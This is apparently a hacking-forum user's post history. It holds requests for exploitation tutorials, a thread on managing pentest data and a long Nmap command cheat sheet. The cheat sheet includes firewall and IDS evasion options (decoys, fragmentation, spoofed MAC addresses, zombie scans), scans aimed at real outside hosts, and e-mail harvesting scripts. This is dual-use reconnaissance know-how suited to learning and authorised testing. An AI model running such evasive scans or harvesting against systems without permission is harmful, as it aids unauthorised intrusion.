Show Posts



Messages - ba8y

1
 :) 
Is there a VM with tutorials or papers for binary software exploitation?
I'm a newbie in binary exploitation and want to learn it.
It's better to teach a man to fish than give him a fish. Thanks!

2
@shome @nemon1c Thanks for the reply.  ;)

Actually, the way through the exploitme series is the key.
We should know how to exploit software flaws.

Hacking - The Art of Exploitation is a good choice, but we need more.

Download:
https://evilzone.org/ebooks/t11265/

3
Yeah, I copied his question here.   :D

This is a paper called buffer-overflow-tutorial-on-DVL.
http://tech.brookes.ac.uk/frmitchell/p00410/practicals/week-2-practicals/buffer-overflow-tutorial/at_download/file

We need something more about it.

4
Hey guys,

I've just got DVL (Damn Vulnerable Linux) up and running, but can't find the text tutorials that are meant to come with it anywhere. There are also meant to be video tutorials, but the links to them on the DVL homepage are dead and reverse-engineering.net is down at the moment.

As such I was wondering if anyone could point me in the direction of them? Either online or within the distro itself.

Thanks a lot!

Links:
https://www.vulnhub.com/entry/damn-vulnerable-linux-dvl-15-infectious-disease,1/

5
Hacking and Security / Re: pentesting data management
« on: July 30, 2014, 04:56:03 am »
Thanks for sharing.

@noncetonic:  "Within each client truecrypt archive I would create a folder for every portion of the pentest (internal, external, webapp, physical, etc.) that rested inside of a folder created for the year of the test (many clients want to be tested multiple times a year or at least once every year)."

This is a good idea. What I've done is to create a folder, e.g. "2014_07_07_CompanyName", and place everything (text, Burp Suite logs, zips, pictures and so on) there without labels. It's hard to get useful information quickly once the data gets big.

Now, [Metasploit] + [Dradis / MagicTree / Kvasir] is my choice. Dradis always saves the data as an attachment except for a few supported formats, and what we need is visual data (e.g. text). MagicTree is so simple. Kvasir is complex to set up, and we need to redo it again and again when the workplace changes.

@Architect: Your ideas can contribute to the "Anonymity" part.


[Clear structure] and [quick information search] are the keys.

6
Hacking and Security / pentesting data management
« on: July 29, 2014, 08:24:36 am »
Could you show me how to manage data during pentesting?
Text files and directories are what I use, and they tie me down.


7
Hacking and Security / Learn more about Nmap
« on: January 28, 2014, 09:35:17 am »

Dare to ignore or neglect
any of them and you could be missing out on the one piece of information that you need to
completely compromise your target.

http://nmap.org/
http://en.wikipedia.org/wiki/Transmission_Control_Protocol
http://en.wikipedia.org/wiki/User_Datagram_Protocol
http://www.iana.org/assignments/port-numbers
http://www.iana.org/assignments/protocol-numbers/
http://www.cyberciti.biz/networking/nmap-command-examples-tutorials/

Nmap Cookbook The Fat-free Guide to Network Scanning.pdf
Nmap 6: Network Exploration and Security Auditing Cookbook  ---- [something timeout]
Nmap in the Enterprise. Your Guide to Network Scanning
Nmap Network Scanning: The Official Nmap Project Guide



Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.  Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.  Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.  It was designed to rapidly scan large networks, but works fine against single hosts.  Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.  In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

But I want to say that Nmap is unreliable sometimes, please read...

[Lab] Windows 7 + BackTrack R3 x86 GNOME (vbox)

Code:


************************
Basic Scanning Overview
************************

- Firewalls, routers, proxy servers, and other security devices.
- Some scanning options require elevated privileges.
 
  1. Scan a Single Target
  2. Scan Multiple Targets
  3. Scan a Range of IP Addresses
  4. Scan an Entire Subnet
  5. Scan a List of Targets
  6. Scan Random Targets
  7. Exclude Targets from a Scan
  8. Exclude Targets Using a List
  9. Perform an Aggressive Scan
  10. Scan an IPv6 Target


1. Scan a Single Target
   //-- nmap 192.168.1.1 --//
   A default Nmap scan will check for the 1000 most commonly used TCP/IP ports.
   Port states:
   open / closed / filtered / unfiltered / open|filtered / closed|filtered
   

2. Scan Multiple Targets
   //-- nmap 192.168.1.1 192.168.1.2 192.168.1.3 --//
   //-  nmap 192.168.1.136,139,150 -//
   Nmap can be used to scan multiple hosts at the same time.
   

3. Scan a Range of IP Addresses
   //-- nmap 192.168.1.1-10 --//
   //-- nmap 192.168.1-100.* --//
   The asterisk is a wildcard character which represents all valid ranges from 0-255.
   
   
4. Scan an Entire Subnet
   //-- nmap 192.168.1.1/24 --//
   

5. Scan a List of Targets
   //-- nmap -iL hosts_list.txt --//
   --------hosts_list.txt--------
   192.168.1.1
   192.168.1.2
   192.168.1.3

   Each entry in [hosts_list.txt] must be separated by a space, tab, or newline.


6. Scan Random Targets
   //-- nmap -iR 3 --//
   Nmap will randomly generate the specified number of targets and attempt to scan them.
   

7. Exclude Targets from a Scan
   //-- nmap 192.168.1.1/24 --exclude 192.168.1.100,192.168.1.108 --//
   //-- nmap 192.168.1.1/24 --exclude 192.168.1.100-108 --//
   The --exclude option accepts single hosts, ranges, or entire network blocks (using CIDR notation).


8. Exclude Targets Using a List
   //-- nmap 192.168.1.1/24 --excludefile hosts_list.txt --//
   --------hosts_list.txt--------
   192.168.1.10
   192.168.1.20
   192.168.1.30


9. Perform an Aggressive Scan
   //-- nmap -A 192.168.1.1 --//


10. Scan an IPv6 Target
   //-- nmap -6 fe80::29aa:9db9:4164:d80e --//





******************
Discovery Options
******************

Before port scanning a target, Nmap will attempt to send ICMP echo requests to see if the host is "alive".
This can save time when scanning multiple hosts as Nmap will not waste time attempting to probe hosts that
are not online.

Because ICMP requests are often blocked by firewalls, Nmap will also attempt to connect to ports 80 and 443
since these common web server ports are often open (even if ICMP is not).

The default discovery options aren't useful when scanning secured systems and can hinder scanning progress.

  1. Don't ping                       ---- [-Pn]
  2. Perform a Ping Only Scan         ---- [-sn/-sP]
  3. TCP SYN Ping                     ---- [-PS]
  4. TCP ACK Ping                     ---- [-PA]
  5. UDP Ping                         ---- [-PU]
  6. SCTP Ping                        ---- [-PY]
  7. ICMP Echo Ping                   ---- [-PE]
  8. ICMP Timestamp Ping              ---- [-PP]
  9. ICMP Address Mask Ping           ---- [-PM]
  10. IP Protocol Ping                ---- [-PO]
  11. ARP Ping                        ---- [-PR]
  12. Traceroute                      ---- [--traceroute]
  13. Force Reverse DNS Resolution    ---- [-R]
  14. Disable Reverse DNS Resolution  ---- [-n]
  15. Alternative DNS Lookup          ---- [--system-dns]
  16. Manually Specify DNS Server(s)  ---- [--dns-servers]
  17. Create a Host List              ---- [-sL] 


1. Don't Ping
   //-- nmap -Pn 192.168.1.1 --//
   By default, Nmap will first ping the target to see if it is online.
   This feature helps save time when scanning as it causes targets that do not respond to be skipped.
   By specifying the [-Pn] option, Nmap is able to produce a list of open ports on the unpingable system.

2. Ping Only Scan
   //- nmap -sn 192.168.1.1 -//
   //- nmap -sP 192.168.1.1 -//
   //- nmap -sn -PE -PP -PS443 -PA80 192.168.1.1 -//
   ICMP Ping + TCP[SYN--->443]+TCP[ACK---->80]
   
   [-sn] is much more powerful than [-sP]. For example:
   ------------ [-sP] -------------
   Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-21 08:21 EST
   Nmap scan report for localhost (192.168.1.1)
   Host is up (0.0062s latency).
   MAC Address: 78:A1:06:xx:xx:xx (Unknown)
   Nmap scan report for localhost (192.168.1.100)
   Host is up (0.00058s latency).
   MAC Address: 60:D8:19:xx:xx:xx (Hon Hai Precision Ind. Co.)
   Nmap scan report for localhost (192.168.1.107)
   Host is up.
   Nmap scan report for localhost (192.168.1.198)
   Host is up (0.0085s latency).
   MAC Address: EC:17:2F:xx:xx:xx (Unknown)
   Nmap done: 256 IP addresses (4 hosts up) scanned in 2.90 seconds

   
   ------------ [-sn] -------------
   Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-21 08:21 EST
   Nmap scan report for localhost (192.168.1.1)
   Host is up (0.0083s latency).
   MAC Address: 78:A1:06:xx:xx:xx (Unknown)
   Nmap scan report for localhost (192.168.1.100)
   Host is up (0.00049s latency).
   MAC Address: 60:D8:19:xx:xx:xx (Hon Hai Precision Ind. Co.)
   Nmap scan report for localhost (192.168.1.102) -------------------- [Attention Here]
   Host is up (0.056s latency).
   MAC Address: E0:CA:94:xx:xx:xx (Askey Computer)
   Nmap scan report for localhost (192.168.1.107)
   Host is up.
   Nmap scan report for localhost (192.168.1.198)
   Host is up (0.028s latency).
   MAC Address: EC:17:2F:xx:xx:xx (Unknown)
   Nmap done: 256 IP addresses (5 hosts up) scanned in 6.04 seconds


3. TCP SYN Ping
   //- nmap -PS22,25,80,443 192.168.1.1 -//
   The TCP SYN ping sends a SYN packet to the target system and listens for a response.
   This alternative discovery method is useful for systems that are configured to block standard ICMP pings.
   The default port for [-PS] is 80. Twice for 80.
   

4. TCP ACK Ping
   //- nmap -PA 192.168.1.1 -//     -----> port scan
   //- nmap -sn -PA 192.168.1.1 -// -----> no port scan
   This method attempts to discover hosts by responding to TCP connections that are nonexistent in an attempt
   to solicit a response from the target. It is useful in situations where standard ICMP pings are blocked.
   The default port for [-PA] is 80.

5. UDP Ping
   //- nmap -sn -PU 192.168.1.1 -// ------> port: 40125
   //- nmap -PU22,25,80,443 192.168.1.1 -//
   //- nmap -sn -PU135,137,138,445 192.168.1.1 -//
   While most firewalled systems will block this type of connection,
   some poorly configured systems may allow it if they are only configured to filter TCP connections.
   The default port for [-PU] is 40125.


6. SCTP INIT Ping
   //- nmap -PY 192.168.1.1 -//
   This discovery method attempts to locate hosts using the Stream Control Transmission Protocol (SCTP).
   SCTP is typically used on systems for IP based telephony.
   The default port for [-PY] is 80.

7. ICMP Echo Ping
   //- nmap -PE 192.168.1.1 -//

   //- nmap -sn -PE www.baidu.com/24 -//              ----- XXXXXXX
   //- fping -c 1 -g 119.75.217.1 119.75.217.255 -//  ----- more available hosts
   [-PE] option is automatically implied if no other ping options are specified.
   
8. ICMP Timestamp Ping
   //- nmap -PP 192.168.1.1 -//      ----- port scan
   //- nmap -sn -PP 192.168.1.1 -//  ----- no port scan
   When most firewalled systems are configured to block ICMP echo requests,
   some improperly configured systems may still reply to ICMP timestamp requests.
   
9. ICMP Address Mask Ping
   //- nmap -PM 192.168.1.1 -//      ----- port scan
   //- nmap -sn -PM 192.168.1.1 -//  ----- no port scan
   This type of ping can occasionally sneak past a firewall that is configured to block standard echo requests.

10. IP Protocol Ping
   //- nmap -PO1,2,4 192.168.1.1 -//
   An IP protocol ping sends packets with the specified protocol to the target.
   If no protocols are specified, the default protocols 1(ICMP), 2(IGMP), 4(IP-in-IP) are used.
   A complete list of Internet Protocol numbers ----
   http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml

11. ARP Ping  ---- option removed
   //- nmap -PR 192.168.1.1 -//
   ARP scans cannot be performed on targets that are not on your local subnet.

12. Traceroute
   //- nmap --traceroute scanme.insecure.org -//
   The information displayed is similar to the traceroute or tracepath commands.

13. Force Reverse DNS Resolution
   //- nmap -R 173.194.127.56 -//
   +++++++++++++++++++++++++++++++++++++++++++++++++
   Nmap scan report for hkg03s10-in-f24.1e100.net (173.194.127.56)
   Host is up (0.012s latency).
   Not shown: 998 filtered ports
   PORT    STATE SERVICE
   80/tcp  open  http
   443/tcp open  https

   Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds
   +++++++++++++++++++++++++++++++++++++++++++++++++

   By default, Nmap will only do reverse DNS for hosts that appear to be online.
   The [-R] option is useful when performing reconnaissance on a block of IP addresses
   as Nmap will try to resolve DNS information of every IP address.
   The reverse DNS information can reveal interesting information about the target IP
   address (even if it is offline or blocking Nmap's probes).

14. Disable Reverse DNS Resolution
    //- nmap -n 173.194.127.56 -//
    ++++++++++++++++++++++++++++++++++++++++++++++
    Nmap scan report for 173.194.127.56
    Host is up (0.011s latency).
    Not shown: 998 filtered ports
    PORT    STATE SERVICE
    80/tcp  open  http
    443/tcp open  https

    Nmap done: 1 IP address (1 host up) scanned in 5.06 seconds
    ++++++++++++++++++++++++++++++++++++++++++++++
   
    Using the -n option greatly reduces scanning times -
    especially when scanning a large number of hosts.
   
15. Alternative DNS Lookup Method
    //- nmap --system-dns 173.194.127.56 -//
    Use the host system's DNS resolver instead of its own internal method.
    This option is rarely used as it is much slower than the default method.
    It can be useful when troubleshooting DNS problems with Nmap.

    The system resolver is always used for IPv6 scans
    as Nmap has not yet fully implemented its own internal IPv6 resolver.


16. Manually Specify DNS Server(s)
    //- nmap --dns-servers 8.8.8.8,8.8.4.4 173.194.127.56 -//
    Nmap's default behavior will use the DNS servers configured on your local system for name resolution.
   
17. Create a Host List
    //- nmap -sL 173.194.127.1/24 -//
    This scan is useful for identifying the IP addresses and DNS names for the specified targets without
    sending any packets to them. Many DNS names can reveal interesting information about an IP address including
    what it is used for or where it is located.
   
   
   
   
*************************
Advanced Scanning Options
*************************

Nmap supports a number of user selectable scan types. By default, Nmap will perform a basic TCP scan on each system.
In some situations, it may be necessary to perform more complex TCP (or even UDP) scans in an attempt to find
uncommon services or evade a firewall.

You must login with root/administrator privileges to execute many of the scans discussed in this section.

By default, Nmap sends some signal characters. For example:
nmap -sU -p 135 192.168.1.1        ------------ signal characters [Malformed Packet: BT-uTP]
nmap -sU -p 135 --data-length 40 192.168.1.1


  1. TCP SYN Scan        --------- [-sS]
  2. TCP Connect Scan    --------- [-sT]
  3. UDP Scan            --------- [-sU]
  4. TCP NULL Scan       --------- [-sN]
  5. TCP FIN Scan        --------- [-sF]
  6. Xmas Scan           --------- [-sX]
  7. Custom TCP Scan     --------- [--scanflags]
  8. TCP ACK Scan        --------- [-sA]
  9. IP Protocol Scan    --------- [-sO]
  10. Send Raw Ethernet Packets --------- [--send-eth]
  11. Send IP Packets           --------- [--send-ip]


1. TCP SYN Scan
   //- nmap -sS 192.168.1.1 -//
   The TCP SYN scan is the default option for privileged users (root or administrators).
   The default TCP SYN scan attempts to identify the 1000 most commonly used TCP ports by sending a SYN packet
   to the target and listening for a response.
   This type of scan is said to be stealthy because it does not attempt to open a full-fledged connection to
   the remote host.
   This prevents many systems from logging a connection attempt from your scan.
   
2. TCP Connect Scan
   //- nmap -sT 192.168.1.1 -//
   The [-sT] scan is the default scan type for non-privileged users.


3. UDP Scan
   //- nmap -sU 192.168.1.1 -//
   While TCP is the most commonly used protocol, many network services (like DNS, DHCP, and SNMP) still utilize UDP.

4. TCP NULL Scan
   //- nmap -sN 192.168.1.1 -//
   A TCP NULL scan causes Nmap to send packets with no TCP flags enabled.
   This is done by setting the packet header to 0. Sending NULL packets to a target is a method of tricking a firewalled
   system into generating a response.

5. TCP FIN Scan
   //- nmap -sF 192.168.1.1 -//
   In a [-sF] scan, Nmap marks the TCP FIN bit active when sending packets in an attempt to solicit a TCP ACK from the target.
   This is another method of sending unexpected packets to a target in an attempt to produce results from a system protected
   by a firewall.
   
6. Xmas Scan
   //- nmap -sX 192.168.1.1 -//
   Nmap sends packets with the URG, FIN, and PSH flags activated. This has the effect of "lighting the packet up like a Christmas tree"
   and can occasionally solicit a response from a firewalled system.
   Not all systems will respond to probes of this type.

7. Custom TCP Scan
   //- nmap --scanflags SYNURG 192.168.1.1 -//
   +++++++++++++++++++++++++++++++++++++++++++
   [ Flag ]        [Usage]
     SYN           Synchronize
     ACK           Acknowledgment
     PSH           Push
     URG           Urgent
     RST           Reset
     FIN           Finished

8. TCP ACK Scan
   //- nmap -sA 192.168.1.1 -//
   When performing a TCP ACK scan, Nmap will probe a target and look for RST responses.
   If no response is received the system is considered to be filtered.
   If the system does return an RST packet, then it is labeled as unfiltered.

9. IP Protocol Scan
   //- nmap -sO 192.168.1.1 -//
   The IP protocol scan displays the IP protocols that are supported on the target system.
   The most commonly found protocols on modern systems are ICMP, TCP, and UDP.
   Using the [-sO] option is helpful for quickly identifying what types of scans you want
   to perform on the selected target system based on its supported protocols.

10. Send Raw Ethernet Packets
    //- nmap --send-eth 192.168.1.1 -//
    Enabling this option instructs Nmap to bypass the IP layer on your system and send raw
    ethernet packets on the data link layer. This can be used to overcome problems with
    your system's IP stack.

11. Send IP Packets
    //- nmap --send-ip 192.168.1.1 -//
    Enabling this option forces Nmap to scan using the local system's IP stack instead of
    generating raw ethernet packets.



*********************
Port Scanning Options
*********************

There are a total of 131,070 TCP/IP ports (65,535 TCP and 65,535 UDP).
Nmap, by default, only scans 1,000 of the most commonly used ports.
This is done to save time when scanning multiple targets as the majority of ports outside the top
1000 are rarely used. Sometimes, however, you may want to scan outside the default range of ports
to look for uncommon services or ports that have been forwarded to a different location.

  1. Perform a Fast Scan       ------  [-F]
  2. Scan Specific Ports       ------  [-p port]
  3. Scan Ports by Name        ------  [-p name]
  4. Scan Ports by Protocol    ------  [-p U:[UDP ports],T:[TCP ports]]
  5. Scan All Ports            ------  -p "*"
  6. Scan Top Ports            ------  --top-ports [number]
  7. Perform a Sequential Port Scan  ------ -r
  8. Scan ports more common than <ratio -- decimal number between 0 and 1>  ------  [--port-ratio]


1. Perform a Fast Scan
   //- nmap -F 192.168.1.1 -//
   Nmap scans the top 1000 commonly used ports by default.
   The [-F] option reduces that number to 100.

2. Scan Specific Ports
   //- nmap -p 80 192.168.1.1 -//
   //- nmap -p 25,53,80-200 192.168.1.1 -//
   //- nmap -p- 192.168.1.1 -//

3. Scan Ports by Name
   //- nmap -p ftp,smtp,http 192.168.1.1 -//
   //- nmap -p "http*" 192.168.1.1 -//
   The name(s) specified must match a service in the nmap-services file.
   [/usr/local/share/nmap] or [C:\Program Files\Nmap]
   
4. Scan Ports by Protocol
   //- nmap -sU -sT -p U:53,T:25 192.168.1.1 -//
   Specifying a [T:] or [U:] prefix with the -p option allows you to search for a specific port and protocol combination.
   Nmap, by default, will only scan TCP ports. In order to scan both TCP and UDP ports,
   you will need to enable additional scan types such as [-sU] and [-sT].

5. Scan All Ports
   //- nmap -p "*" 192.168.1.1 -//

6. Scan Top Ports
   //- nmap --top-ports 10 192.168.1.1 -//
   By default, Nmap will scan the 1000 most commonly used ports.
   
7. Perform a Sequential Port Scan
   //- nmap -r 192.168.1.1 -//
   Nmap's default scanning algorithm randomizes the port scan order.
   This is useful for evading firewalls and intrusion prevention systems.

8. Scan ports more common than <ratio -- decimal number between 0 and 1>
   //- nmap --port-ratio 0.5 192.168.1.1 -//

***************************************
Operating System and Service Detection
***************************************

The process of identifying a target's operating system and software version is known as TCP/IP fingerprinting.

  1. Operating System Detection       ------   [-O]
  2. Attempt to Guess an Unknown OS   ------   [--osscan-guess]
  3. Service Version Detection        ------   [-sV]
  4. Troubleshooting Version Scans    ------   [--version-trace]
  5. Perform an RPC Scan              ------   [-sR]
  6. Set from 0 (light) to 9 (try all probes)   ------  [--version-intensity]
  7. Limit to most likely probes (intensity 2)  ------  [--version-light]
  8. Try every single probe (intensity 9)       ------  [--version-all]



1. Operating System Detection
   //- nmap -O 192.168.1.1 -//
   In order for OS detection to work properly there must be at least one open and one closed port on the target
   system. When scanning multiple targets, the [--osscan-limit] option can be combined with [-O] to instruct Nmap
   not to OS scan hosts that do not meet this criteria.

   If Nmap is unable to determine the operating system on a target, it will provide a fingerprint which can be submitted to
   Nmap's OS database at www.nmap.org/submit/
   
2. Attempt to Guess an Unknown Operating System
   //- nmap -O --osscan-guess 192.168.1.1 -//
   If Nmap is unable to identify the OS, you can force it to guess by using the [--osscan-guess] option.

3. Service Version Detection
   //- nmap -sV 192.168.1.1 -//
   Nmap version detection purposely skips some problematic ports (specifically 9100-9107).
   
4. Troubleshooting Version Scans
   //- nmap -sV --version-trace 192.168.1.1 -//

5. Perform an RPC Scan
   WARNING: -sR is now an alias for -sV and activates version detection as well as RPC scan.

6. Set from 0 (light) to 9 (try all probes)
   //- nmap -Pn -sS -sV --version-intensity 0 -p 135 192.168.1.1 -//

**************
Timing Options
**************

When scanning a large number of hosts on a fast network you may want to increase the number
of parallel operations to get faster results.

When scanning slow networks (or across the internet) you may want to slow down a scan to get
more accurate results or to evade intrusion detection systems. This section discusses the options
available for these timing features.

  1. Timing Templates                  ------  -T[0-5]
  2. Set the Packet TTL                ------  --ttl
  3. Minimum # of Parallel Operations  ------  --min-parallelism
  4. Maximum # of Parallel Operations  ------  --max-parallelism
  5. Minimum Host Group Size           ------  --min-hostgroup
  6. Maximum Host Group Size           ------  --max-hostgroup
  7. Maximum RTT Timeout               ------  --max-rtt-timeout
  8. Initial RTT Timeout               ------  --initial-rtt-timeout
  9. Maximum Retries                   ------  --max-retries
  10. Host Timeout                     ------  --host-timeout
  11. Minimum Scan Delay               ------  --scan-delay
  12. Maximum Scan Delay               ------  --max-scan-delay
  13. Minimum Packet Rate              ------  --min-rate
  14. Maximum Packet Rate              ------  --max-rate
  15. Defeat Reset Rate Limits         ------  --defeat-rst-ratelimit


Timing Parameters

Nmap timing parameters are accepted as milliseconds by default.
You can also specify parameters in seconds, minutes, or hours by appending a qualifier to the time argument.
(none)  ---- Milliseconds [500,  500 milliseconds]
    s   ---- Seconds      [300s, 300 seconds]
    m   ---- Minutes      [5m,  5 minutes]
    h   ---- hours        [1h,  1 hour]


1. Timing Templates
   //- nmap -T[0-5] 192.168.1.1 -//
   -T0  ---- paranoid ---- Extremely slow
   -T1  ---- sneaky   ---- Useful for avoiding intrusion detection systems
   -T2  ---- polite   ---- Unlikely to interfere with the target system
   -T3  ---- normal   ---- This is the default timing template
   -T4  ---- aggressive ---- Produces faster results on local networks
   -T5  ---- insane   ---- Very fast and aggressive scan

2. Set the Packet TTL
   //- nmap --ttl 500 scanme.insecure.org -//
   This option is useful when scanning targets on slow connections where normal packets may time out before receiving a response.

3. Minimum Number of Parallel Operations
   //- nmap -sn -PE --min-parallelism 100 192.168.1.1/24 -//
   The [--min-parallelism] option is used to specify the minimum number of parallel port scan operations
   Nmap should perform at any given time.
   Nmap automatically adjusts parallel scanning options based on network conditions.
   While manually setting the [--min-parallelism] option may increase scan performance,
   setting it too high may produce inaccurate results.

4. Maximum Number of Parallel Operations
   //- nmap -sn -PE --max-parallelism 10 192.168.1.1/24 -//
   
5. Minimum Host Group Size
   //- nmap --min-hostgroup 30 192.168.1.1/24 -//
   Nmap will perform scans in parallel to save time when scanning multiple targets such as a range or entire subnet.
   
6. Maximum Host Group Size
   //- nmap --max-hostgroup 10 192.168.1.1/24 -//
   In contrast to the --min-hostgroup option, the --max-hostgroup option controls the maximum number of hosts in a group.
   This option is helpful if you want to reduce the load on a network or to avoid triggering any red flags with various
   network security products.

7. Initial RTT Timeout
   //- nmap --initial-rtt-timeout 5000 scanme.insecure.org -//
   The default timing template (-T3) has an --initial-rtt-timeout value of 1000 milliseconds.
   Increasing the value will reduce the number of packet retransmissions due to timeouts.
   By decreasing the value you can speed up scans; but do so with caution.
   Setting the RTT timeout value too low can negate any potential performance gains and lead to
   inaccurate results.
   
8. Maximum RTT Timeout
   //- nmap --max-rtt-timeout 400 scanme.insecure.org -//
   Nmap dynamically adjusts RTT timeout options for best results by default.
   The default maximum RTT timeout is 10 seconds. Manually adjusting the maximum RTT timeout lower will allow for faster scan
   times (especially when scanning large blocks of addresses).
   Specifying a high maximum RTT timeout will prevent Nmap from giving up too soon when scanning over slow/unreliable connections.
   
9. Maximum Retries
   //- nmap --max-retries 2 scanme.insecure.org -//
   By default, Nmap will automatically adjust the number of probe retransmissions based on network conditions.
   
10. Host Timeout
   //- nmap --host-timeout 1m 192.168.1.1 -//
   A host may take a long time to scan if it is located on a slow or unreliable network.
   Systems that are protected by rate limiting firewalls may also take a considerable amount of time to scan.

   In the above example, if the scan takes longer than one minute to complete, Nmap terminates it.

11. Minimum Scan Delay
   //- nmap --scan-delay 5s scanme.insecure.org -//
   
12. Maximum Scan Delay
   //- nmap --max-scan-delay 300 scanme.insecure.org -//

13. Minimum Packet Rate
   //- nmap --min-rate 30 scanme.insecure.org -//
   The [--min-rate] option is used to specify the minimum number of packets Nmap should send per second.
   
14. Maximum Packet Rate
   //- nmap --max-rate 30 scanme.insecure.org -//
   //- nmap --max-rate 0.1 scanme.insecure.org -//  ----- send one packet every ten seconds.
   The [--max-rate] option is used to specify the maximum number of packets Nmap should send per second.

15. Defeat Reset Rate Limits
   //- nmap --defeat-rst-ratelimit scanme.insecure.org -//
   The [--defeat-rst-ratelimit] option is used to defeat targets that apply rate limiting to RST (reset) packets.
   



******************
Evading Firewalls
******************
Firewalls and intrusion prevention systems are designed to prevent tools like Nmap from getting an accurate picture of the systems.

  1. Fragment Packets               ----    [-f]
  2. Specify a Specific MTU         ----    [--mtu]
  3. Use a Decoy                    ----    [-D]
  4. Idle Zombie Scan               ----    [-sI]
  5. Manually Specify a Source Port ----    [--source-port]
  6. Append Random Data             ----    [--data-length]
  7. Randomize Target Scan Order    ----    [--randomize-hosts]
  8. Spoof MAC Address              ----    [--spoof-mac]
  9. Send Bad Checksums             ----    [--badsum]


1. Fragment Packet
   //- nmap -f 192.168.1.1 -//
   The [-f] option instructs Nmap to send small 8-byte packets, thus fragmenting the probe into many very small packets.
   This option isn't particularly useful in everyday situations; it may be helpful when attempting to evade some older
   or improperly configured firewalls.

   Some host operating systems may require the use of [--send-eth] combined with [-f] for fragmented packets to be properly transmitted.

2. Specify a Specific MTU
   //- nmap --mtu 16 192.168.1.1 -//
   The [--mtu] option is similar to the [-f] option except it allows you to specify your own MTU to be used during scanning.
   This creates fragmented packets that can potentially confuse some firewalls.
   The MTU must be a multiple of 8 (example 8,16,24,32, etc)
   
3. Use a Decoy
   //- nmap -D RND:10 192.168.1.1 -//
   When performing a decoy scan Nmap will spoof additional packets from the specified number of decoy addresses. This effectively makes it
   appear that the target is being scanned by multiple systems simultaneously. Using decoys allows the actual source of the scan to "blend
   into the crowd" which makes it harder to trace where the scan is coming from.

   In the above example [nmap -D RND:10] instructs Nmap to generate 10 random decoys.
   Using too many decoys can cause network congestion and reduce the effectiveness of a scan.
   Additionally, some internet service providers may filter spoofed traffic which will reduce the effectiveness of using decoys to cloak scanning.
   
4. Idle Zombie Scan
   //- nmap -sI 192.168.1.100 192.168.1.1 -//
   
   The idle zombie scan is a unique scanning technique that allows you to exploit an idle system and use it to scan a target for you.
   In order for an idle scan to be successful, the zombie system must truly be idle at the time of scanning.

5. Manually Specify a Source Port Number
   This technique can be used to exploit weaknesses in firewalls that are improperly configured to blindly accept incoming traffic based
   on a specific port number.

6. Append Random Data
   //- nmap --data-length 25 192.168.1.1 -//
   Nmap transmits packets which are generally a specific size. Some firewall vendors know to look for this type of predictable packet size.
   
7. Randomize Target Scan Order
   //- nmap --randomize-hosts 192.168.1.1/24 -//
   The [--randomize-hosts] option helps prevent scans of multiple targets from being detected by firewalls and intrusion detection systems.
   This is done by scanning them in a random order instead of sequential.

8. Spoof MAC Address
   //- nmap --spoof-mac [vendor|MAC|0] 192.168.1.1 -//
   
   [0                    ]  --------  Generate a random MAC address
   [Specific MAC Address ]  --------  Uses the specified MAC address
   [Vendor Name          ]  --------  Generates a MAC address from the specified vendor (such as Apple, Dell, 3Com, etc)

9. Send Bad Checksums
   //- nmap --badsum 192.168.1.1 -//
   The TCP/IP protocol uses checksums to ensure data integrity. Crafting packets with bad checksums can, in some rare occasions, produce a
   response from a poorly configured system.
   Only a poorly configured system would respond to a packet with a bad checksum. Nevertheless, it is a good tool to use when auditing network
   security or attempting to evade firewalls.




***************
Output Options
***************

    Save Output to a Text File      -------- [-oN]
    Save Output to an XML File      -------- [-oX]
    Grepable Output                 -------- [-oG]
    Output All Supported File Types -------- [-oA]
    133t Output                     -------- [-oS]

   
*****************************
Troubleshooting and Debugging
*****************************

    Getting Help                ----------  -h
    Display Nmap Version        ----------  -V
    Verbose Output              ----------  -v
    Debugging                   ----------  -d
    Display Port State Reason   ----------  --reason
    Only Display Open Ports     ----------  --open
    Trace Packets               ----------  --packet-trace
    Display Host Networking     ----------  --iflist
    Specify a Network Interface ----------  -e



****************************
Nmap Scripting Engine (NSE)
****************************
Network discovery
More sophisticated Version detection
Vulnerability detection
Backdoor detection
Vulnerability exploitation




   1. Gathering Additional Host Information
   2. Auditing Web Servers
   3. Auditing Databases
   4. Auditing Mail Servers
   5. Scanning Large Networks
   6. Generating Scanning Reports
   7. Writing Your Own NSE Scripts


1. Gathering Additional Host Information
   1.1 Geolocating an IP address
   1.2 Getting information from WHOIS records
   1.3 Checking if a host is known for malicious activities
   1.4 Collecting valid e-mail accounts
   1.5 Discovering hostnames pointing to the same IP address
   1.6 Brute forcing DNS records
   1.7 Fingerprinting the Operating system of a host
   1.8 Discovering UDP services
   1.9 Listing protocols supported by a remote host
   1.10 Discovering stateful firewalls by using a TCP ACK scan
   1.11 Matching services with known security vulnerabilities
   1.12 Spoofing the origin IP of a port scan




1. Gathering Additional Host Information
 
1.1 Geolocating an IP address
   ip-geolocation-maxmind, ip-geolocation-ipinfodb, ip-geolocation-geobytes, ip-geolocation-geoplugin

   ip-geolocation-geobytes  ---- http://nmap.org/nsedoc/scripts/ip-geolocation-geobytes.html
   ip-geolocation-geoplugin ---- http://nmap.org/nsedoc/scripts/ip-geolocation-geoplugin.html
   ip-geolocation-ipinfodb  ---- http://nmap.org/nsedoc/scripts/ip-geolocation-ipinfodb.html
   ip-geolocation-maxmind   ---- http://nmap.org/nsedoc/scripts/ip-geolocation-maxmind.html

   //- nmap --script ip-geolocation-* <target> -//


1.2 Getting Information from WHOIS records
   whois  ----  http://nmap.org/nsedoc/scripts/whois.html

   //- nmap --script whois scanme.nmap.org -//
   //- nmap --script whois --script-args whois.whodb=arin+ripe+afrinic scanme.nmap.org -//
   //- nmap -sn --script whois -v -iL hosts.txt -//
   //- nmap -sn --script whois --script-args whois.whodb=nocache scanme.nmap.org -//


1.3 Checking if a host is known for malicious activities
   //- nmap -p80 --script http-email-harvest exploit-db.com -//
